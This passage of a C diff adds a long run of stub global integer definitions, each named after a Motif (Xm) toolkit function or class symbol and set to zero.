+int _XmDataFieldConvert = 0;
+int XmDataFieldCopy = 0;
+int _XmDataFieldCountBytes = 0;
+int XmDataFieldCut = 0;
+int _XmDataFieldDeselectSelection = 0;
+int XmDataFielddf_ClearSelection = 0;
+int _XmDataFielddf_SetCursorPosition = 0;
+int XmDataFielddf_SetCursorPosition = 0;
+int _XmDataFielddf_SetDestination = 0;
+int _XmDataFieldDrawInsertionPoint = 0;
+int XmDataFieldGetAddMode = 0;
+int XmDataFieldGetBaseline = 0;
+int XmDataFieldGetCursorPosition = 0;
+int _XmDataFieldGetDropReciever = 0;
+int XmDataFieldGetEditable = 0;
+int XmDataFieldGetInsertionPosition = 0;
+int XmDataFieldGetLastPosition = 0;
+int XmDataFieldGetMaxLength = 0;
+int XmDataFieldGetSelection = 0;
+int XmDataFieldGetSelectionPosition = 0;
+int XmDataFieldGetSelectionWcs = 0;
+int XmDataFieldGetString = 0;
+int XmDataFieldGetStringWcs = 0;
+int XmDataFieldGetSubstring = 0;
+int XmDataFieldGetSubstringWcs = 0;
+int XmDataFieldInsert = 0;
+int XmDataFieldInsertWcs = 0;
+int _XmDataFieldLoseSelection = 0;
+int XmDataFieldPaste = 0;
+int XmDataFieldPosToXY = 0;
+int XmDataFieldRemove = 0;
+int XmDataFieldReplace = 0;
+int _XmDataFieldReplaceText = 0;
+int XmDataFieldReplaceWcs = 0;
+int XmDataFieldSetAddMode = 0;
+int _XmDataFieldSetClipRect = 0;
+int XmDataFieldSetEditable = 0;
+int XmDataFieldSetHighlight = 0;
+int XmDataFieldSetInsertionPosition = 0;
+int XmDataFieldSetMaxLength = 0;
+int _XmDataFieldSetSel2 = 0;
+int XmDataFieldSetSelection = 0;
+int XmDataFieldSetString = 0;
+int XmDataFieldShowPosition = 0;
+int _XmDataFieldStartSelection = 0;
+int xmDataFieldWidgetClass = 0;
+int XmDataFieldXYToPos = 0;
+int _XmDataFPrimClassExtRec = 0;
+int _XmDataFToggleCursorGC = 0;
+int XmDeactivateProtocol = 0;
+int _XmDefaultColorObj = 0;
+int _XmDefaultDragIconQuark = 0;
+int _XmdefaultTextActionsTable = 0;
+int _XmdefaultTextActionsTableSize = 0;
+int _XmDefaultVisualResources = 0;
+int xmDesktopClass = 0;
+int xmDesktopClassRec = 0;
+int xmDesktopObjectClass = 0;
+int _XmDestinationHandler = 0;
+int _XmDestroyDefaultDragIcon = 0;
+int _XmDestroyFocusData = 0;
+int _XmDestroyMotifWindow = 0;
+int _XmDestroyParentCallback = 0;
+int XmDestroyPixmap = 0;
+int _XmDestroyTearOffShell = 0;
+int xmDialogShellClassRec = 0;
+int xmDialogShellExtClassRec = 0;
+int xmDialogShellExtObjectClass = 0;
+int xmDialogShellWidgetClass = 0;
+int _XmDifferentBackground = 0;
+int _XmDirectionDefault = 0;
+int XmDirectionMatch = 0;
+int XmDirectionMatchPartial = 0;
+int XmDirectionToStringDirection = 0;
+int _XmDismissTearOff = 0;
+int _XmDispatchGadgetInput = 0;
+int _XmDisplay_baseTranslations = 0;
+int xmDisplayClass = 0;
+int xmDisplayClassRec = 0;
+int xmDisplayObjectClass = 0;
+int _XmDoGadgetTraversal = 0;
+int XmDragCancel = 0;
+int _XmDragC_defaultTranslations = 0;
+int xmDragContextClass = 0;
+int xmDragContextClassRec = 0;
+int xmDragIconClassRec = 0;
+int _XmDragIconClean = 0;
+int _XmDragIconIsDirty = 0;
+int xmDragIconObjectClass = 0;
+int _XmDragOverChange = 0;
+int _XmDragOverFinish = 0;
+int _XmDragOverGetActiveCursor = 0;
+int _XmDragOverHide = 0;
+int _XmDragOverMove = 0;
+int _XmDragOverSetInitialPosition = 0;
+int xmDragOverShellClassRec = 0;
+int xmDragOverShellWidgetClass = 0;
+int _XmDragOverShow = 0;
+int XmDragStart = 0;
+int _XmDragUnderAnimation = 0;
+int _XmDrawArrow = 0;
+int XmDrawBevel = 0;
+int _XmDrawBorder = 0;
+int _XmDrawDiamond = 0;
+int _XmDrawDiamondButton = 0;
+int _XmDrawHighlight = 0;
+int _XmDrawingA_defaultTranslations = 0;
+int xmDrawingAreaClassRec = 0;
+int _XmDrawingAreaInput = 0;
+int xmDrawingAreaWidgetClass = 0;
+int _XmDrawingA_traversalTranslations = 0;
+int _XmDrawnB_defaultTranslations = 0;
+int _XmDrawnB_menuTranslations = 0;
+int _XmDrawnBPrimClassExtRec = 0;
+int xmDrawnButtonClassRec = 0;
+int xmDrawnButtonWidgetClass = 0;
+int _XmDrawSeparator = 0;
+int _XmDrawShadow = 0;
+int _XmDrawShadows = 0;
+int _XmDrawShadowType = 0;
+int _XmDrawSimpleHighlight = 0;
+int _XmDrawSquareButton = 0;
+int xmDropDownClassRec = 0;
+int XmDropDownGetArrow = 0;
+int XmDropDownGetChild = 0;
+int XmDropDownGetLabel = 0;
+int XmDropDownGetList = 0;
+int XmDropDownGetText = 0;
+int XmDropDownGetValue = 0;
+int xmDropDownWidgetClass = 0;
+int XmDropSiteConfigureStackingOrder = 0;
+int XmDropSiteEndUpdate = 0;
+int XmDropSiteGetActiveVisuals = 0;
+int xmDropSiteManagerClassRec = 0;
+int xmDropSiteManagerObjectClass = 0;
+int XmDropSiteQueryStackingOrder = 0;
+int XmDropSiteRegister = 0;
+int XmDropSiteRegistered = 0;
+int XmDropSiteRetrieve = 0;
+int _XmDropSiteShell = 0;
+int XmDropSiteStartUpdate = 0;
+int XmDropSiteUnregister = 0;
+int XmDropSiteUpdate = 0;
+int _XmDropSiteWrapperCandidate = 0;
+int XmDropTransferAdd = 0;
+int xmDropTransferClassRec = 0;
+int xmDropTransferObjectClass = 0;
+int XmDropTransferStart = 0;
+int _XmDSIAddChild = 0;
+int _XmDSIDestroy = 0;
+int _XmDSIGetBorderWidth = 0;
+int _XmDSIGetChildPosition = 0;
+int _XmDSIRemoveChild = 0;
+int _XmDSIReplaceChild = 0;
+int _XmDSISwapChildren = 0;
+int _XmDSMGetTreeFromDSM = 0;
+int _XmDSMUpdate = 0;
+int _XmDSResources = 0;
+int XmeAddFocusChangeCallback = 0;
+int XmeClearBorder = 0;
+int XmeClipboardSink = 0;
+int XmeClipboardSource = 0;
+int XmeConfigureObject = 0;
+int XmeConvertMerge = 0;
+int XmeCountVaListSimple = 0;
+int XmeCreateClassDialog = 0;
+int _XmEditResCheckMessages = 0;
+int XmeDragSource = 0;
+int XmeDrawArrow = 0;
+int XmeDrawCircle = 0;
+int XmeDrawDiamond = 0;
+int XmeDrawHighlight = 0;
+int XmeDrawIndicator = 0;
+int XmeDrawPolygonShadow = 0;
+int XmeDrawSeparator = 0;
+int XmeDrawShadows = 0;
+int XmeDropSink = 0;
+int XmeFlushIconFileCache = 0;
+int XmeFocusIsInShell = 0;
+int XmeFromHorizontalPixels = 0;
+int XmeFromVerticalPixels = 0;
+int XmeGetColorObjData = 0;
+int XmeGetDefaultPixel = 0;
+int XmeGetDefaultRenderTable = 0;
+int XmeGetDesktopColorCells = 0;
+int XmeGetDirection = 0;
+int XmeGetEncodingAtom = 0;
+int XmeGetHomeDirName = 0;
+int XmeGetIconControlInfo = 0;
+int XmeGetLocalizedString = 0;
+int XmeGetMask = 0;
+int XmeGetNextCharacter = 0;
+int XmeGetNullCursor = 0;
+int XmeGetPixelData = 0;
+int XmeGetPixmapData = 0;
+int XmeGetTextualDragIcon = 0;
+int XmeMicroSleep = 0;
+int _XmEmptyRect = 0;
+int XmeNamedSink = 0;
+int XmeNamedSource = 0;
+int XmeNamesAreEqual = 0;
+int XmeNavigChangeManaged = 0;
+int _XmEnterGadget = 0;
+int _XmEnterRowColumn = 0;
+int _XmEntryByteCountGet = 0;
+int _XmEntryCacheGet = 0;
+int _XmEntryCharCountGet = 0;
+int _XmEntryDirectionGet = 0;
+int _XmEntryDirectionSet = 0;
+int _XmEntryPopGet = 0;
+int _XmEntryPushGet = 0;
+int _XmEntryRendBeginCountGet = 0;
+int _XmEntryRendBeginGet = 0;
+int _XmEntryRendBeginSet = 0;
+int _XmEntryRendEndCountGet = 0;
+int _XmEntryRendEndGet = 0;
+int _XmEntryRendEndSet = 0;
+int _XmEntryTabsGet = 0;
+int _XmEntryTag = 0;
+int _XmEntryTagSet = 0;
+int _XmEntryTextGet = 0;
+int _XmEntryTextSet = 0;
+int _XmEntryTextTypeGet = 0;
+int XmeParseUnits = 0;
+int XmePrimarySink = 0;
+int XmePrimarySource = 0;
+int XmeQueryBestCursorSize = 0;
+int _XmEraseShadow = 0;
+int XmeRedisplayGadgets = 0;
+int XmeRemoveFocusChangeCallback = 0;
+int XmeRenderTableGetDefaultFont = 0;
+int XmeReplyToQueryGeometry = 0;
+int XmeResolvePartOffsets = 0;
+int XmeSecondarySink = 0;
+int XmeSecondarySource = 0;
+int XmeSecondaryTransfer = 0;
+int XmeSetWMShellTitle = 0;
+int XmeStandardConvert = 0;
+int XmeStandardTargets = 0;
+int XmeStringGetComponent = 0;
+int XmeStringIsValid = 0;
+int XmeToHorizontalPixels = 0;
+int XmeToVerticalPixels = 0;
+int XmeTraitGet = 0;
+int XmeTraitSet = 0;
+int XmeTransferAddDoneProc = 0;
+int XmeUseColorObj = 0;
+int XmeVirtualToActualKeysyms = 0;
+int XmeVLCreateWidget = 0;
+int XmeWarning = 0;
+int XME_WARNING = 0;
+int XmeXpmAttributesSize = 0;
+int XmeXpmCreateBufferFromImage = 0;
+int XmeXpmCreateBufferFromPixmap = 0;
+int XmeXpmCreateBufferFromXpmImage = 0;
+int XmeXpmCreateDataFromImage = 0;
+int XmeXpmCreateDataFromPixmap = 0;
+int XmeXpmCreateDataFromXpmImage = 0;
+int XmeXpmCreateImageFromBuffer = 0;
+int XmeXpmCreateImageFromData = 0;
+int XmeXpmCreateImageFromXpmImage = 0;
+int XmeXpmCreatePixmapFromBuffer = 0;
+int XmeXpmCreatePixmapFromData = 0;
+int XmeXpmCreatePixmapFromXpmImage = 0;
+int XmeXpmCreateXpmImageFromBuffer = 0;
+int XmeXpmCreateXpmImageFromData = 0;
+int XmeXpmCreateXpmImageFromImage = 0;
+int XmeXpmCreateXpmImageFromPixmap = 0;
+int XmeXpmFree = 0;
+int XmeXpmFreeAttributes = 0;
+int XmeXpmFreeExtensions = 0;
+int XmeXpmFreeXpmImage = 0;
+int XmeXpmFreeXpmInfo = 0;
+int XmeXpmGetErrorString = 0;
+int XmeXpmLibraryVersion = 0;
+int XmeXpmReadFileToBuffer = 0;
+int XmeXpmReadFileToData = 0;
+int XmeXpmReadFileToImage = 0;
+int XmeXpmReadFileToPixmap = 0;
+int XmeXpmReadFileToXpmImage = 0;
+int XmeXpmWriteFileFromBuffer = 0;
+int XmeXpmWriteFileFromData = 0;
+int XmeXpmWriteFileFromImage = 0;
+int XmeXpmWriteFileFromPixmap = 0;
+int XmeXpmWriteFileFromXpmImage = 0;
+int xmExt18ListClassRec = 0;
+int XmExt18ListDeselectItems = 0;
+int XmExt18ListDeselectRow = 0;
+int XmExt18ListGetSelectedRowArray = 0;
+int XmExt18ListGetSelectedRows = 0;
+int XmExt18ListMakeRowVisible = 0;
+int XmExt18ListSelectAllItems = 0;
+int XmExt18ListSelectItems = 0;
+int XmExt18ListSelectRow = 0;
+int XmExt18ListToggleRow = 0;
+int XmExt18ListUnselectAllItems = 0;
+int XmExt18ListUnselectItem = 0;
+int xmExt18ListWidgetClass = 0;
+int xmExtClassRec = 0;
+int _XmExtGetValuesHook = 0;
+int _XmExtHighlightBorder = 0;
+int _XmExtImportArgs = 0;
+int _XmExtObjAlloc = 0;
+int xmExtObjectClass = 0;
+int _XmExtObjFree = 0;
+int _XmExtUnhighlightBorder = 0;
+int _Xm_fastPtr = 0;
+int _XmFastSubclassInit = 0;
+int _XmFileSBGeoMatrixCreate = 0;
+int xmFileSelectionBoxClassRec = 0;
+int _XmFileSelectionBoxCreateDirList = 0;
+int _XmFileSelectionBoxCreateDirListLabel = 0;
+int _XmFileSelectionBoxCreateFilterLabel = 0;
+int _XmFileSelectionBoxCreateFilterText = 0;
+int _XmFileSelectionBoxFocusMoved = 0;
+int XmFileSelectionBoxGetChild = 0;
+int _XmFileSelectionBoxGetDirectory = 0;
+int _XmFileSelectionBoxGetDirListItemCount = 0;
+int _XmFileSelectionBoxGetDirListItems = 0;
+int _XmFileSelectionBoxGetDirListLabelString = 0;
+int _XmFileSelectionBoxGetDirMask = 0;
+int _XmFileSelectionBoxGetFilterLabelString = 0;
+int _XmFileSelectionBoxGetListItemCount = 0;
+int _XmFileSelectionBoxGetListItems = 0;
+int _XmFileSelectionBoxGetNoMatchString = 0;
+int _XmFileSelectionBoxGetPattern = 0;
+int _XmFileSelectionBoxNoGeoRequest = 0;
+int _XmFileSelectionBoxRestore = 0;
+int _XmFileSelectionBoxUpOrDown = 0;
+int xmFileSelectionBoxWidgetClass = 0;
+int XmFileSelectionDoSearch = 0;
+int _XmFilterArgs = 0;
+int _XmFilterResources = 0;
+int _XmFindNextTabGroup = 0;
+int _XmFindPrevTabGroup = 0;
+int _XmFindTabGroup = 0;
+int _XmFindTopMostShell = 0;
+int _XmFindTraversablePrim = 0;
+int _XmFocusInGadget = 0;
+int _XmFocusIsHere = 0;
+int _XmFocusIsInShell = 0;
+int _XmFocusModelChanged = 0;
+int _XmFocusOutGadget = 0;
+int XmFontListAdd = 0;
+int XmFontListAppendEntry = 0;
+int XmFontListCopy = 0;
+int XmFontListCreate = 0;
+int XmFontListCreate_r = 0;
+int XmFontListEntryCreate = 0;
+int XmFontListEntryCreate_r = 0;
+int XmFontListEntryFree = 0;
+int XmFontListEntryGetFont = 0;
+int XmFontListEntryGetTag = 0;
+int XmFontListEntryLoad = 0;
+int XmFontListFree = 0;
+int XmFontListFreeFontContext = 0;
+int _XmFontListGetDefaultFont = 0;
+int XmFontListGetNextFont = 0;
+int XmFontListInitFontContext = 0;
+int XmFontListNextEntry = 0;
+int XmFontListRemoveEntry = 0;
+int _XmFontListSearch = 0;
+int xmFontSelectorClassRec = 0;
+int xmFontSelectorWidgetClass = 0;
+int _XmForegroundColorDefault = 0;
+int xmFormClassRec = 0;
+int xmFormWidgetClass = 0;
+int xmFrameClassRec = 0;
+int _XmFrame_defaultTranslations = 0;
+int xmFrameWidgetClass = 0;
+int _XmFreeDragReceiverInfo = 0;
+int _XmFreeHashTable = 0;
+int _XmFreeMotifAtom = 0;
+int _XmFreeScratchPixmap = 0;
+int _XmFreeTravGraph = 0;
+int _XmFreeWidgetExtData = 0;
+int _XmFromHorizontalPixels = 0;
+int _XmFromLayoutDirection = 0;
+int _XmFromPanedPixels = 0;
+int _XmFromVerticalPixels = 0;
+int _XmGadClassExtRec = 0;
+int _XmGadgetActivate = 0;
+int _XmGadgetArm = 0;
+int _XmGadgetButtonMotion = 0;
+int xmGadgetClass = 0;
+int xmGadgetClassRec = 0;
+int _XmGadgetDrag = 0;
+int _XmGadgetGetValuesHook = 0;
+int _XmGadgetImportArgs = 0;
+int _XmGadgetImportSecondaryArgs = 0;
+int _XmGadgetKeyInput = 0;
+int _XmGadgetMultiActivate = 0;
+int _XmGadgetMultiArm = 0;
+int _XmGadgetSelect = 0;
+int _XmGadgetTraverseCurrent = 0;
+int _XmGadgetTraverseDown = 0;
+int _XmGadgetTraverseHome = 0;
+int _XmGadgetTraverseLeft = 0;
+int _XmGadgetTraverseNext = 0;
+int _XmGadgetTraverseNextTabGroup = 0;
+int _XmGadgetTraversePrev = 0;
+int _XmGadgetTraversePrevTabGroup = 0;
+int _XmGadgetTraverseRight = 0;
+int _XmGadgetTraverseUp = 0;
+int _XmGadgetWarning = 0;
+int _XmGeoAdjustBoxes = 0;
+int _XmGeoArrangeBoxes = 0;
+int _XmGeoBoxesSameHeight = 0;
+int _XmGeoBoxesSameWidth = 0;
+int _XmGeoClearRectObjAreas = 0;
+int _XmGeoCount_kids = 0;
+int _XmGeoGetDimensions = 0;
+int _XmGeoLoadValues = 0;
+int _XmGeoMatrixAlloc = 0;
+int _XmGeoMatrixFree = 0;
+int _XmGeoMatrixGet = 0;
+int _XmGeoMatrixSet = 0;
+int _XmGeometryEqual = 0;
+int _XmGeoReplyYes = 0;
+int _XmGeoSetupKid = 0;
+int _XmGetActiveDropSite = 0;
+int _XmGetActiveItem = 0;
+int _XmGetActiveProtocolStyle = 0;
+int _XmGetActiveTabGroup = 0;
+int _XmGetActiveTopLevelMenu = 0;
+int _XmGetActualClass = 0;
+int _XmGetArrowDrawRects = 0;
+int XmGetAtomName = 0;
+int _XmGetAudibleWarning = 0;
+int _XmGetBGPixmapName = 0;
+int _XmGetBitmapConversionModel = 0;
+int _XmGetBottomShadowColor = 0;
+int _XmGetClassExtensionPtr = 0;
+int _XmGetColorAllocationProc = 0;
+int XmGetColorCalculation = 0;
+int _XmGetColorCalculationProc = 0;
+int _XmGetColoredPixmap = 0;
+int _XmGetColors = 0;
+int XmGetColors = 0;
+int _XmGetDefaultBackgroundColorSpec = 0;
+int _XmGetDefaultColors = 0;
+int _XmGetDefaultDisplay = 0;
+int _XmGetDefaultFontList = 0;
+int _XmGetDefaultThresholdsForScreen = 0;
+int _XmGetDefaultTime = 0;
+int XmGetDestination = 0;
+int _XmGetDisplayObject = 0;
+int XmGetDragContext = 0;
+int _XmGetDragContextFromHandle = 0;
+int _XmGetDragCursorCachePtr = 0;
+int _XmGetDragProtocolStyle = 0;
+int _XmGetDragProxyWindow = 0;
+int _XmGetDragReceiverInfo = 0;
+int _XmGetDropSiteManagerObject = 0;
+int _XmGetEffectiveView = 0;
+int _XmGetEncodingRegistryTarget = 0;
+int _XmGetFirstFocus = 0;
+int _XmGetFirstFont = 0;
+int _XmGetFocus = 0;
+int _XmGetFocusData = 0;
+int _XmGetFocusFlag = 0;
+int _XmGetFocusPolicy = 0;
+int _XmGetFocusResetFlag = 0;
+int XmGetFocusWidget = 0;
+int _XmGetFontUnit = 0;
+int _XmGetHashEntryIterate = 0;
+int _XmGetHighlightColor = 0;
+int _XmGetIconControlInfo = 0;
+int XmGetIconFileName = 0;
+int _XmGetIconPixmapName = 0;
+int _XmGetImage = 0;
+int _XmGetImageAndHotSpotFromFile = 0;
+int _XmGetImageFromFile = 0;
+int _XmGetInDragMode = 0;
+int _XmGetInsensitiveStippleBitmap = 0;
+int _XmGetKidGeo = 0;
+int _XmGetLayoutDirection = 0;
+int _XmGetManagedInfo = 0;
+int _XmGetMaxCursorSize = 0;
+int _XmGetMBStringFromXmString = 0;
+int XmGetMenuCursor = 0;
+int _XmGetMenuCursorByScreen = 0;
+int _XmGetMenuProcContext = 0;
+int _XmGetMenuState = 0;
+int _XmGetMotifAtom = 0;
+int _XmGetMoveOpaqueByScreen = 0;
+int _XmGetNavigability = 0;
+int _XmGetNavigationType = 0;
+int _Xm_GetNewElement = 0;
+int XmGetNewPictureState = 0;
+int _XmGetNullCursor = 0;
+int _XmGetPixelData = 0;
+int _XmGetPixmap = 0;
+int XmGetPixmap = 0;
+int _XmGetPixmapBasedGC = 0;
+int XmGetPixmapByDepth = 0;
+int _XmGetPixmapData = 0;
+int _XmGetPointVisibility = 0;
+int _XmGetPopupMenuClick = 0;
+int XmGetPostedFromWidget = 0;
+int _XmGetRC_PopupPosted = 0;
+int _XmGetRealXlations = 0;
+int _XmGetScaledPixmap = 0;
+int XmGetScaledPixmap = 0;
+int _XmGetScreenObject = 0;
+int XmGetSecondaryResourceData = 0;
+int _XmGetTabGroup = 0;
+int XmGetTabGroup = 0;
+int XmGetTearOffControl = 0;
+int _XmGetTextualDragIcon = 0;
+int XmGetToolTipString = 0;
+int _XmGetTopShadowColor = 0;
+int _XmGetTransientFlag = 0;
+int _XmGetUnitType = 0;
+int _XmGetUnpostBehavior = 0;
+int XmGetVisibility = 0;
+int _XmGetWidgetExtData = 0;
+int _XmGetWidgetNavigPtrs = 0;
+int _XmGetWorldObject = 0;
+int _XmGetWrapperData = 0;
+int XmGetXmDisplay = 0;
+int _XmGetXmDisplayClass = 0;
+int XmGetXmScreen = 0;
+int _XmGMCalcSize = 0;
+int _XmGMDoLayout = 0;
+int _XmGMEnforceMargin = 0;
+int _XmGMHandleGeometryManager = 0;
+int _XmGMHandleQueryGeometry = 0;
+int _XmGMOverlap = 0;
+int _XmGMReplyToQueryGeometry = 0;
+int _XmGrabKeyboard = 0;
+int _XmGrabPointer = 0;
+int xmGrabShellClassRec = 0;
+int _XmGrabShell_translations = 0;
+int xmGrabShellWidgetClass = 0;
+int _XmGrabTheFocus = 0;
+int _XmHandleGeometryManager = 0;
+int _XmHandleMenuButtonPress = 0;
+int _XmHandleQueryGeometry = 0;
+int _XmHandleSizeUpdate = 0;
+int _XmHashTableCount = 0;
+int _XmHashTableSize = 0;
+int _XmHeapAlloc = 0;
+int _XmHeapCreate = 0;
+int _XmHeapFree = 0;
+int xmHierarchyClassRec = 0;
+int XmHierarchyGetChildNodes = 0;
+int XmHierarchyOpenAllAncestors = 0;
+int xmHierarchyWidgetClass = 0;
+int _XmHighlightBorder = 0;
+int _XmHighlightColorDefault = 0;
+int _XmHighlightPixmapDefault = 0;
+int _XmHWQuery = 0;
+int xmI18ListClassRec = 0;
+int XmI18ListDeselectItems = 0;
+int XmI18ListDeselectRow = 0;
+int XmI18ListDoSearch = 0;
+int XmI18ListFindRow = 0;
+int XmI18ListGetSelectedRowArray = 0;
+int XmI18ListGetSelectedRows = 0;
+int XmI18ListMakeRowVisible = 0;
+int XmI18ListSelectAllItems = 0;
+int XmI18ListSelectItems = 0;
+int XmI18ListSelectRow = 0;
+int XmI18ListToggleRow = 0;
+int xmI18ListWidgetClass = 0;
+int _XmICCCallbackToICCEvent = 0;
+int _XmICCEventToICCCallback = 0;
+int xmIconBoxClassRec = 0;
+int XmIconBoxIsCellEmpty = 0;
+int xmIconBoxWidgetClass = 0;
+int xmIconButtonClassRec = 0;
+int xmIconButtonWidgetClass = 0;
+int xmIconGadgetClass = 0;
+int xmIconGadgetClassRec = 0;
+int _XmIconGadgetIconPos = 0;
+int xmIconGCacheObjClassRec = 0;
+int xmIconHeaderClass = 0;
+int xmIconHeaderClassRec = 0;
+int _XmIEndUpdate = 0;
+int _XmImChangeManaged = 0;
+int XmImCloseXIM = 0;
+int _XmImFreeShellData = 0;
+int XmImFreeXIC = 0;
+int XmImGetXIC = 0;
+int XmImGetXICResetState = 0;
+int XmImGetXIM = 0;
+int XmImMbLookupString = 0;
+int XmImMbResetIC = 0;
+int _XmImRealize = 0;
+int _XmImRedisplay = 0;
+int XmImRegister = 0;
+int _XmImResize = 0;
+int XmImSetFocusValues = 0;
+int XmImSetValues = 0;
+int XmImSetXIC = 0;
+int XmImUnregister = 0;
+int XmImUnsetFocus = 0;
+int XmImVaSetFocusValues = 0;
+int XmImVaSetValues = 0;
+int _XmIndexToTargets = 0;
+int _XmInheritClass = 0;
+int _XmInImageCache = 0;
+int _XmInitByteOrderChar = 0;
+int _XmInitializeExtensions = 0;
+int _XmInitializeMenuCursor = 0;
+int _XmInitializeScrollBars = 0;
+int _XmInitializeSyntheticResources = 0;
+int _XmInitializeTraits = 0;
+int _XmInitModifiers = 0;
+int _XmInitTargetsTable = 0;
+int _XmInputForGadget = 0;
+int _XmInputInGadget = 0;
+int _XmInstallImage = 0;
+int XmInstallImage = 0;
+int _XmInstallPixmap = 0;
+int _XmInstallProtocols = 0;
+int XmInternAtom = 0;
+int _XmIntersectionOf = 0;
+int _XmIntersectRect = 0;
+int _XmInvalidCursorIconQuark = 0;
+int _XmIsActiveTearOff = 0;
+int _XmIsEventUnique = 0;
+int _XmIsFastSubclass = 0;
+int _XmIsISO10646 = 0;
+int XmIsMotifWMRunning = 0;
+int _XmIsNavigable = 0;
+int _XmIsScrollableClipWidget = 0;
+int _XmIsSlowSubclass = 0;
+int _XmIsStandardMotifWidgetClass = 0;
+int _XmIsSubclassOf = 0;
+int _XmIsTearOffShellDescendant = 0;
+int XmIsTraversable = 0;
+int _XmIsViewable = 0;
+int _XmJpegErrorExit = 0;
+int _XmJpegGetImage = 0;
+int _XmLabel_AccessTextualRecord = 0;
+int _XmLabelCacheCompare = 0;
+int _XmLabelCalcTextRect = 0;
+int xmLabelClassRec = 0;
+int _XmLabelCloneMenuSavvy = 0;
+int _XmLabelConvert = 0;
+int _XmLabel_defaultTranslations = 0;
+int _XmLabelGadClassExtRec = 0;
+int xmLabelGadgetClass = 0;
+int xmLabelGadgetClassRec = 0;
+int xmLabelGCacheObjClassRec = 0;
+int _XmLabelGCalcTextRect = 0;
+int _XmLabelGCloneMenuSavvy = 0;
+int _XmLabelGCVTRedraw = 0;
+int _XmLabel_menuTranslations = 0;
+int _XmLabel_menu_traversal_events = 0;
+int _XmLabelPrimClassExtRec = 0;
+int _XmLabelSetBackgroundGC = 0;
+int xmLabelWidgetClass = 0;
+int _XmLeafPaneFocusOut = 0;
+int _XmLeaveGadget = 0;
+int _XmLinkCursorIconQuark = 0;
+int _XmListAddAfter = 0;
+int _XmListAddBefore = 0;
+int XmListAddItem = 0;
+int XmListAddItems = 0;
+int XmListAddItemsUnselected = 0;
+int XmListAddItemUnselected = 0;
+int xmListClassRec = 0;
+int _XmListCount = 0;
+int XmListDeleteAllItems = 0;
+int XmListDeleteItem = 0;
+int XmListDeleteItems = 0;
+int XmListDeleteItemsPos = 0;
+int XmListDeletePos = 0;
+int XmListDeletePositions = 0;
+int XmListDeselectAllItems = 0;
+int XmListDeselectItem = 0;
+int XmListDeselectPos = 0;
+int _XmListExec = 0;
+int _XmListFree = 0;
+int XmListGetKbdItemPos = 0;
+int XmListGetMatchPos = 0;
+int XmListGetSelectedPos = 0;
+int _XmListInit = 0;
+int XmListItemExists = 0;
+int XmListItemPos = 0;
+int _XmList_ListXlations1 = 0;
+int _XmList_ListXlations2 = 0;
+int XmListPosSelected = 0;
+int XmListPosToBounds = 0;
+int _XmListRemove = 0;
+int XmListReplaceItems = 0;
+int XmListReplaceItemsPos = 0;
+int XmListReplaceItemsPosUnselected = 0;
+int XmListReplaceItemsUnselected = 0;
+int XmListReplacePositions = 0;
+int XmListSelectItem = 0;
+int XmListSelectPos = 0;
+int XmListSetAddMode = 0;
+int XmListSetBottomItem = 0;
+int XmListSetBottomPos = 0;
+int XmListSetHorizPos = 0;
+int XmListSetItem = 0;
+int XmListSetKbdItemPos = 0;
+int XmListSetPos = 0;
+int XmListUpdateSelectedList = 0;
+int xmListWidgetClass = 0;
+int XmListYToPos = 0;
+int _XmLowerCase = 0;
+int _XmLowerTearOffObscuringPoppingDownPanes = 0;
+int xmMainWindowClassRec = 0;
+int XmMainWindowSep1 = 0;
+int XmMainWindowSep2 = 0;
+int XmMainWindowSep3 = 0;
+int XmMainWindowSetAreas = 0;
+int xmMainWindowWidgetClass = 0;
+int _XmMakeGeometryRequest = 0;
+int xmManagerClassRec = 0;
+int _XmManager_defaultTranslations = 0;
+int _XmManagerEnter = 0;
+int _XmManagerFocusIn = 0;
+int _XmManagerFocusInInternal = 0;
+int _XmManagerFocusOut = 0;
+int _XmManagerGetValuesHook = 0;
+int _XmManagerHelp = 0;
+int _XmManagerHighlightPixmapDefault = 0;
+int _XmManagerImportArgs = 0;
+int _XmManagerLeave = 0;
+int _XmManager_managerTraversalTranslations = 0;
+int _XmManagerParentActivate = 0;
+int _XmManagerParentCancel = 0;
+int _XmManagerTopShadowPixmapDefault = 0;
+int _XmManagerUnmap = 0;
+int xmManagerWidgetClass = 0;
+int _XmMapBtnEvent = 0;
+int _XmMapHashTable = 0;
+int _XmMapKeyEvent = 0;
+int _XmMapKeyEvents = 0;
+int XmMapSegmentEncoding = 0;
+int _XmMatchBDragEvent = 0;
+int _XmMatchBSelectEvent = 0;
+int _XmMatchBtnEvent = 0;
+int _XmMatchKeyEvent = 0;
+int _XmMenuBarFix = 0;
+int _XmMenuBarGadgetSelect = 0;
+int _XmMenuBtnDown = 0;
+int _XmMenuBtnUp = 0;
+int _XmMenuButtonTakeFocus = 0;
+int _XmMenuButtonTakeFocusUp = 0;
+int _XmMenuCursorContext = 0;
+int _XmMenuEscape = 0;
+int _XmMenuFocus = 0;
+int _XmMenuFocusIn = 0;
+int _XmMenuFocusOut = 0;
+int _XmMenuGadgetDrag = 0;
+int _XmMenuGadgetTraverseCurrent = 0;
+int _XmMenuGadgetTraverseCurrentUp = 0;
+int _XmMenuGrabKeyboardAndPointer = 0;
+int _XmMenuHelp = 0;
+int _XmMenuPopDown = 0;
+int XmMenuPosition = 0;
+int _XmMenuSetInPMMode = 0;
+int xmMenuShellClassRec = 0;
+int _XmMenuShell_translations = 0;
+int xmMenuShellWidgetClass = 0;
+int _XmMenuTraversalHandler = 0;
+int _XmMenuTraverseDown = 0;
+int _XmMenuTraverseLeft = 0;
+int _XmMenuTraverseRight = 0;
+int _XmMenuTraverseUp = 0;
+int _XmMenuUnmap = 0;
+int xmMessageBoxClassRec = 0;
+int _XmMessageBoxGeoMatrixCreate = 0;
+int XmMessageBoxGetChild = 0;
+int _XmMessageBoxNoGeoRequest = 0;
+int xmMessageBoxWidgetClass = 0;
+int _XmMessageTypeToReason = 0;
+int _XmMgrTraversal = 0;
+int _XmMicroSleep = 0;
+int _Xm_MOTIF_DRAG_AND_DROP_MESSAGE = 0;
+int _XmMoveCursorIconQuark = 0;
+int _XmMoveObject = 0;
+int _XmMoveWidget = 0;
+int _XmMsgBaseClass_0000 = 0;
+int _XmMsgBaseClass_0001 = 0;
+int _XmMsgBulletinB_0001 = 0;
+int _XmMsgCascadeB_0000 = 0;
+int _XmMsgCascadeB_0001 = 0;
+int _XmMsgCascadeB_0002 = 0;
+int _XmMsgCascadeB_0003 = 0;
+int _XmMsgColObj_0001 = 0;
+int _XmMsgColObj_0002 = 0;
+int _XmMsgComboBox_0000 = 0;
+int _XmMsgComboBox_0001 = 0;
+int _XmMsgComboBox_0004 = 0;
